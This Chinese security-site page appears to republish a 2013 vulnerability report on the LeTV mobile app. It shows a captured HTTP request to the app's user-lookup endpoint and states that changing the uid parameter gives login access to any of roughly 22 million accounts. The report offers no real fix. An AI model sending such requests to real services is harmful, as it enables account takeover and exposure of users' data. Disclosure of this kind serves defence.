首页 > 安全 > 网站安全

乐视网2200万用户任意用户登录

浏览： ℃

字体：大中小

发布时间：2013-12-17 09:37:12

来源：

乐视APP缺陷导致2000W用户任意登录

登录抓包吧

GET /android/dynamic.php?mod=passport&ctl=index&act=getUserByID&uid=2*&pcode=010210000&version=5.0 HTTP/1.1

Host: dynamic.app.m.letv.com

Connection: keep-alive

Accept-Language: zh-Hans;q=1, en;q=0.9, zh-Hant;q=0.8, fr;q=0.7, de;q=0.6, ja;q=0.5

User-Agent: LetvIphoneClient/5.0 (iPhone; iOS 7.0.3; Scale/2.00)

修改任意uid即可

漏洞证明：

看几张图片就行了

1#进个vip

交易详情

2#第20000000用户

3#第一位内部用户

修复方案：

just the begining

>更多相关文章

首页推荐

东方联盟网培训质量如何?靠谱吗?

　　佛山市东联科技有限公司一直秉承“一切以用户价值为依归

相关文章

24小时热门资讯

24小时回复排行

热门推荐

最新资讯

网络安全

操作系统

黑客防御

站长知识

资讯 | QQ | 安全 | 编程 | 数据库 | 系统 | 网络 | 考试 | 站长 | 关于东联 | 安全雇佣 | 搞笑视频大全 | 微信学院 | 视频课程 |

关于我们 | 联系我们 | 广告服务 | 免责申明 | 作品发布 | 网站地图 | 官方微博 | 技术培训

Copyright © 2007 - 2024 Vm888.Com. All Rights Reserved

粤公网安备 44060402001498号粤ICP备19097316号请遵循相关法律法规

');})();